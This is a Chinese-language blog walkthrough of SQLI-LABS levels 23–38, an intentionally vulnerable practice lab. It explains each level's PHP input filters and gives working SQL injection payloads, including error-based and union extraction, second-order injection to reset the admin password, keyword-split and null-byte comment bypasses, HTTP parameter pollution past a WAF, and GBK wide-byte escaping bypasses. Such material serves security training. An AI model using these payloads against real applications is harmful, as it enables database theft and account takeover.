<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--Description-->
    
        <meta name="description" content="1.SQLI-LABS23$reg = &amp;quot;/#/&amp;quot;;

$reg1 = &amp;quot;/--/&amp;quot;;

$replace = &amp;quot;&amp;quot;;

$id = preg_replace($reg, $replace, $id);

$id = preg_replac">
    

    <!--Author-->
    
        <meta name="author" content="0xEaS">
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="SQL23-38"/>
    

    <!--Open Graph Description-->
    

    <!--Open Graph Site Name-->
    <meta property="og:site_name" content="船到桥头自然直"/>

    <!--Type page-->
    
        <meta property="og:type" content="article" />
    

    <!--Page Cover-->
    

    
        <meta name="twitter:card" content="summary" />
    
    
    

    <!-- Title -->
    
    <title>SQL23-38 - 船到桥头自然直</title>

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.2/css/bootstrap.min.css" integrity="sha384-y3tfxAZXuh4HwSYylfB+J125MxIs6mR5FOHamPBG064zB+AFeWH94NdvaCBm8qnd" crossorigin="anonymous">

    <!-- Custom Fonts -->
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet" />

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/style.css">


    <!-- Google Analytics -->
    


<meta name="generator" content="Hexo 5.2.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>


<body>

<div class="bg-gradient"></div>
<div class="bg-pattern"></div>

<!-- Menu -->
<!--Menu Links and Overlay-->
<div class="menu-bg">
    <div class="menu-container">
        <ul>
            
            <li class="menu-item">
                <a href="/">
                    Home
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/archives">
                    Archives
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/about.html">
                    About
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/tags">
                    Tags
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/categories">
                    Categories
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/contact.html">
                    Contact
                </a>
            </li>
            
        </ul>
    </div>
</div>

<!--Hamburger Icon-->
<nav>
    <a href="#menu"></a>
</nav>

<div class="container">

    <!-- Main Content -->
    <div class="row">
    <div class="col-sm-12">

        <!--Title and Logo-->
        <header>
    <div class="logo">
        <a href="/"><i class="logo-icon fa fa-cube" aria-hidden="true"></i></a>
        
    </div>
</header>

        <section class="main">
            
<div class="post">

    <div class="post-header">
        <h1 class="title">
            <a href="/2020/12/01/SQL23-38/">
                SQL23-38
            </a>
        </h1>
        <div class="post-info">
            
                <span class="date">2020-12-01</span>
            
            
            
        </div>
    </div>

    <div class="content">

        <!-- Gallery -->
        

        <!-- Post Content -->
        <h3 id="1-SQLI-LABS23"><a href="#1-SQLI-LABS23" class="headerlink" title="1.SQLI-LABS23"></a>1.SQLI-LABS23</h3><pre><code>$reg = &quot;/#/&quot;;

$reg1 = &quot;/--/&quot;;

$replace = &quot;&quot;;

$id = preg_replace($reg, $replace, $id);

$id = preg_replace($reg1, $replace, $id);</code></pre>
<p>对#，–，进行了替换成了空格。</p>
<h5 id="①可以采用-；-00代替注释符进行注释"><a href="#①可以采用-；-00代替注释符进行注释" class="headerlink" title="①可以采用 ；%00代替注释符进行注释"></a>①可以采用 ；%00代替注释符进行注释</h5><h5 id="②采用引号闭合方式加报错进行注入"><a href="#②采用引号闭合方式加报错进行注入" class="headerlink" title="②采用引号闭合方式加报错进行注入"></a>②采用引号闭合方式加报错进行注入</h5><p>查库：?id=-1’ or updatexml(null,concat(0x3a,(select database())),null) or ‘1’=’1</p>
<p>查表：?id=-1’ or updatexml(null,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=’数据库名’),null) or ‘1’=’1</p>
<p>查列：?id=-1’ or updatexml(null,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name=’表名’),null) or ‘1’=’1</p>
<p>查数据：?id=-1’ or updatexml(null,concat(0x3a,(select group_concat(username) from 表名),null) or ‘1’=’1</p>
<h5 id="③用联合查询进行注入"><a href="#③用联合查询进行注入" class="headerlink" title="③用联合查询进行注入"></a>③用联合查询进行注入</h5><p>查库：?id=-1’ union select 1,(select database()),3 and ‘1’=’2</p>
<p>剩下自行领会。。</p>
<h3 id="2-SQLI-LABS24"><a href="#2-SQLI-LABS24" class="headerlink" title="2.SQLI-LABS24"></a>2.SQLI-LABS24</h3><p>这关主要是数据从数据库中取出时，没用进行验证造成的注入。（二次注入）</p>
<p>①先用账号admin，密码admin。可以登录成功。</p>
<p>②注册一个新的账号为admin’#,密码为123456。注册成功，注册时对数据进行了转义。但存入数据库里时，会取消**<u>反斜杠</u>**。即在Mysql数据库终端查询数据会发现账号为admin‘#。</p>
<p>③登录admin’#账户，进行密码修改。修改成功此时数据库执行的指令是：</p>
<pre><code>$sql = &quot;UPDATE users SET PASSWORD=&#39;$pass&#39; where username=&#39;admin&#39;#&#39; and password=&#39;$curr_pass&#39; &quot;;</code></pre>
<p>将后面注释掉了，变成修改的是admin这个用户的密码。</p>
<p>④登录admin用户发现密码就是自己修改的密码。这就是二次注入。盗取权限较高用户的密码。</p>
<h3 id="3-SQLI-LABS25"><a href="#3-SQLI-LABS25" class="headerlink" title="3.SQLI-LABS25"></a>3.SQLI-LABS25</h3><pre><code>$id= preg_replace(&#39;/or/i&#39;,&quot;&quot;, $id);      //strip out OR (non case sensitive)

$id= preg_replace(&#39;/AND/i&#39;,&quot;&quot;, $id);    //Strip out AND (non case sensitive)</code></pre>
<p>过滤了大小写的and和or。参数i表示过滤大小写。or,OR,oR,Or都不行。</p>
<ul>
<li>可以通过函数等价方式进行绕过。and=&amp;&amp;=%26%26，or=||（我win 10下&amp;&amp;用不了，是用%26%26代替and）</li>
</ul>
<p>如：</p>
<pre><code>id=1&#39; || &#39;1&#39;=&#39;1</code></pre>
<ul>
<li>可以通过拆分or或者and进行绕过。oorr ,aandnd.</li>
</ul>
<p>如</p>
<pre><code>id=-1&#39; union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema=&#39;security&#39; --+</code></pre>
<p>其他自行发散思维。</p>
<h3 id="4-SQLI-LABS25a"><a href="#4-SQLI-LABS25a" class="headerlink" title="4.SQLI-LABS25a"></a>4.SQLI-LABS25a</h3><p>只是换了数据的闭合形式。不会用报错信息。其他一样。</p>
<h3 id="5-SQLI-LABS26"><a href="#5-SQLI-LABS26" class="headerlink" title="5.SQLI-LABS26"></a>5.SQLI-LABS26</h3><pre><code>$id= preg_replace(&#39;/or/i&#39;,&quot;&quot;, $id);      //strip out OR (non case sensitive)       过滤大小写or

$id= preg_replace(&#39;/and/i&#39;,&quot;&quot;, $id);    //Strip out AND (non case sensitive)       过滤大小写and

$id= preg_replace(&#39;/[\/\*]/&#39;,&quot;&quot;, $id);   //strip out /*                            过滤 /*

$id= preg_replace(&#39;/[--]/&#39;,&quot;&quot;, $id);    //Strip out --                             过滤 --

$id= preg_replace(&#39;/[#]/&#39;,&quot;&quot;, $id);     //Strip out #                              过滤 #

$id= preg_replace(&#39;/[\s]/&#39;,&quot;&quot;, $id);    //Strip out spaces                         过滤 空格

$id= preg_replace(&#39;/[\/\\\\]/&#39;,&quot;&quot;, $id);    //Strip out slashes                    过滤 /和\

$id= preg_replace(&#39;/[ +]/&#39;,&quot;&quot;, $id);        //Strip out spaces.                    过滤 空格

$id= preg_replace(&#39;/union/s&#39;,&quot;&quot;, $id);        //Strip out union                      过滤 单行union

$id= preg_replace(&#39;/select/m&#39;,&quot;&quot;, $id);        //Strip out spaces.                    过滤 多行select

$id= preg_replace(&#39;/union\s+select/i&#39;,&quot;&quot;, $id);      //Strip out UNION &amp; SELECT.      过滤 union+select 大小写</code></pre>
<p>注释符号被过滤了。有个比较投机取巧的注释符；%00代替–或者#。或者利用引号闭合来注入。</p>
<p>绕过空格的方法有，用<u>%20,%09,%0a,%0b,%0c,%0d,%a0</u>来代替。</p>
<p>windows下apache会有解析问题用不了上面这种绕过空格的方法。所以还有终绕过方式。利用括号闭合进行绕过。</p>
<p>如：</p>
<pre><code>id=1&#39; oorr(updatexml(null,concat(0x3a,(select (group_concat(table_name)) from (infoorrmation_schema.tables) where(table_schema=&#39;security&#39;)),0x3a),null));%00</code></pre>
<ul>
<li><h3 id="SQLI-LABS26a"><a href="#SQLI-LABS26a" class="headerlink" title="SQLI-LABS26a"></a>SQLI-LABS26a</h3></li>
<li><p>SQLI-LABS27</p>
</li>
<li><p>SQLI-LABS27a</p>
</li>
<li><p>SQLI-LABS28</p>
</li>
<li><h3 id="SQLI-LABS28a"><a href="#SQLI-LABS28a" class="headerlink" title="SQLI-LABS28a"></a>SQLI-LABS28a</h3><p>这几关都是对不同字符的进行过滤。<u>注入点包裹方式</u>的不同，可以利用<u>延时注入</u>进行判断。如果windows 下，因为apache解析问题而使<u>绕过空格的一些注释符</u></u>不能用，可以使用<u>括号闭合</u>绕过。如果union+select被过滤可以使用<u>布尔盲注结合burpsuite</u>来爆破出信息。</p>
</li>
</ul>
<h3 id="11-SQLI-LABS29"><a href="#11-SQLI-LABS29" class="headerlink" title="11.SQLI-LABS29"></a>11.SQLI-LABS29</h3><p>注：本关需要先在less-29/后加login.php才能正常进行。</p>
<p>知识补充：客户端请求数据—&gt;Tomacat服务器（过滤，验证）—&gt;Apache服务器（解析）—&gt;Tomacat(服务器)—&gt;返回给客户端</p>
<table>
<thead>
<tr>
<th>Web服务器</th>
<th>参数获取函数</th>
<th>获取到的参数</th>
</tr>
</thead>
<tbody><tr>
<td>PHP/Apache</td>
<td>$_GET（   ）</td>
<td>last</td>
</tr>
<tr>
<td>JSP/Tomact</td>
<td>Rsquest.get</td>
<td>first</td>
</tr>
<tr>
<td>Perl(CGI)/Apache</td>
<td>param(    )</td>
<td>first</td>
</tr>
<tr>
<td>Python/Apache</td>
<td>getvalue(    )</td>
<td>all(list)</td>
</tr>
<tr>
<td>ASP/IIS</td>
<td>request.query string(   )</td>
<td>all(comma-delimited string)</td>
</tr>
</tbody></table>
<p>本关的Tomcat服务器过滤，验证。功能类似为一个WAF。但因为Tomcat解析的是第一个参数，而Apache解析的是最后一个。所以可以利用这个进行绕过WAF检测。</p>
<pre><code>$match = preg_match(&quot;/^\d+$/&quot;, $input);       \d  匹配数字字符。等价于 [0-9]。 </code></pre>
<pre><code>less-27/login.php?id=1&amp;id=2&amp;id=3</code></pre>
<p>回显出来的是id=1，还是id=2，还是id=3呢？</p>
<p>因为这里最终是apache进行解析回显。所以回显是id=3。所以保证第一个参数是对的绕过Tomcat检测，在最后一个参数处进行注入即可。</p>
<p>注：该攻击方式为HPP（HTTP Parameter Pollution），是参数污染攻击的一种。</p>
<p>爆库：</p>
<pre><code>less-29/login.php?id=1&amp;id=-1&#39; union select 1,2,database() --+</code></pre>
<p>其他自行思考。这里还有报错回显，所以也可以利用报错注入。</p>
<h3 id="12-SQLI-LABS30"><a href="#12-SQLI-LABS30" class="headerlink" title="12.SQLI-LABS30"></a>12.SQLI-LABS30</h3><h3 id="13-SQLI-LABS31"><a href="#13-SQLI-LABS31" class="headerlink" title="13.SQLI-LABS31"></a>13.SQLI-LABS31</h3><p>这两关和29关差不多只是注入点不同。也可尝试使用延迟注入。</p>
<h3 id="14-SQLI-LABS32"><a href="#14-SQLI-LABS32" class="headerlink" title="14.SQLI-LABS32"></a>14.SQLI-LABS32</h3><pre><code>$string = preg_replace(&#39;/&#39;. preg_quote(&#39;\\&#39;) .&#39;/&#39;, &quot;\\\\\\&quot;, $string);     //escape any backslash

$string = preg_replace(&#39;/\&#39;/i&#39;, &#39;\\\&#39;&#39;, $string);                //escape single quote with a backslash

$string = preg_replace(&#39;/\&quot;/&#39;, &quot;\\\&quot;&quot;, $string);                //escape double quote with a backslash</code></pre>
<p><u>这关对\，‘，“进行了过滤。</u></p>
<p>知识补充：</p>
<pre><code>mysql_query(&quot;SET NAMES gbk&quot;);</code></pre>
<p>对client，conncetion，results的编码方式都设置成了GBK。而我们传进去的数据是以UTF-8进行编码。GBK英文和中文字符都用2个字节进行编码，而UTF-8英文字符使用1个字符，中文则使用3个字节。（具体详情参考我的GBK和UTF-8编码的区别文章）</p>
<p>当GBK对UTF-8编码的数据进行解码，如果高字节&gt;128，低字节也符合相应的要求的话。会被误认为是中文字符进行拼接。</p>
<p>我们用GET注入使传进去的数据会自动进行一次<u>URL编码</u>。因为过滤’，”，\（\是%5c)，如果传进去是1‘会变成<u>1%5c%27</u>。这时’被转义了。如果在<u>‘前加%df</u>呢，会被编码成1%df%5c%27这时传进进行解码，GBK会认为<u>%df%5c</u>是一个整体而解析成一个汉字，而%27即’会被认为是个单独的字符进行解析这样解析完会变成<u>1+中文字符+‘</u>这是’并没并转义。所以成功绕过。</p>
<p>可以构造句子如：</p>
<pre><code>？id=-1%df&#39; union select 1,2,3 --+</code></pre>
<p>其他思想和前面一样。这里不一定要用%df，大于128都可以。</p>
<h3 id="15-SQLI-LABS34"><a href="#15-SQLI-LABS34" class="headerlink" title="15.SQLI-LABS34"></a>15.SQLI-LABS34</h3><p>同样用%df进行注释但发现失败为什么呢？</p>
<p>打开burpsuite代理拦截下请求包会发现：</p>
<pre><code>-admin%df&#39; union select 1,2 #
变成
-admin%25df%5C%27+union+select+1%2C2%23</code></pre>
<p>会发现%df 会变转变成%25%df 它把% 编码成%25了；可以手动删除25 变成%df就可以再像GET注入那样注入了。</p>
<h5 id="另一种注入方法"><a href="#另一种注入方法" class="headerlink" title="另一种注入方法"></a>另一种注入方法</h5><p>�’ union …</p>
<p>�会被编码成%EF%BF%BD，其实原理和上个方法一样。%EF%BF解析成一个汉字    %BD%5C解析成一个汉字，剩下单独一个‘。作者认为这个方法比%df好用！</p>
<h3 id="16-SQLI-LABS32-38"><a href="#16-SQLI-LABS32-38" class="headerlink" title="16.SQLI-LABS32-38"></a>16.SQLI-LABS32-38</h3><p>这几关都是利用宽字节注入方法。只是注入点包裹方式不同，报错回显信息的不同，过滤使用的函数不同。请自行思考！！！</p>

    </div>

    

    

    <!-- Comments -->
    

</div>
        </section>

    </div>
</div>


</div>

<!-- Footer -->
<div class="push"></div>

<footer class="footer-content">
    <div class="container">
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-6 col-lg-6 footer-about">
                <h2>About</h2>
                <p>
                    This theme was developed by <a target="_blank" rel="noopener" href="https://github.com/klugjo">Jonathan Klughertz</a>. The source code is available on Github. Create Websites. Make Magic.
                </p>
            </div>
            
    <div class="col-xs-6 col-sm-6 col-md-3 col-lg-3 recent-posts">
        <h2>Recent Posts</h2>
        <ul>
            
            <li>
                <a class="footer-post" href="/2022/03/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E7%AF%87-NTLM-Relay%E6%94%BB%E5%87%BB/">内网渗透篇-NTLM Relay攻击</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2022/03/06/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E7%AF%87-%E9%9D%9E%E7%BA%A6%E6%9D%9F-%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE%E6%94%BB%E5%87%BB/">内网渗透篇-非约束/约束委派攻击</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2022/02/24/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E7%AF%87-%E9%9A%A7%E9%81%93%E4%BB%A3%E7%90%86/">内网渗透篇-隧道代理</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2022/02/20/Thinkphp6-0-12LTS%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">Thinkphp6.0.12LTS反序列化漏洞分析</a>
            </li>
            
        </ul>
    </div>



            
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <ul class="list-inline footer-social-icons">
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://github.com/klugjo/hexo-theme-alpha-dust">
                            <span class="footer-icon-container">
                                <i class="fa fa-github"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://twitter.com/?lang=en">
                            <span class="footer-icon-container">
                                <i class="fa fa-twitter"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.facebook.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-facebook"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.instagram.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-instagram"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://dribbble.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-dribbble"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://telegram.org/">
                            <span class="footer-icon-container">
                                <i class="fa fa-telegram"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.behance.net/">
                            <span class="footer-icon-container">
                                <i class="fa fa-behance"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://500px.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-500px"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="mailto:test@example.com">
                            <span class="footer-icon-container">
                                <i class="fa fa-envelope-o"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="\#">
                            <span class="footer-icon-container">
                                <i class="fa fa-rss"></i>
                            </span>
                        </a>
                    </li>
                    
                </ul>
            </div>
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <div class="footer-copyright">
                    @Untitled. All right reserved | Design & Hexo <a target="_blank" rel="noopener" href="http://www.codeblocq.com/">Jonathan Klughertz</a>
                </div>
            </div>
        </div>
    </div>
</footer>

<!-- After footer scripts -->

<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>

<!-- Tween Max -->
<script src="//cdnjs.cloudflare.com/ajax/libs/gsap/1.18.5/TweenMax.min.js"></script>

<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Custom JavaScript -->

<script src="/js/main.js"></script>


<!-- Disqus Comments -->



</body>

</html>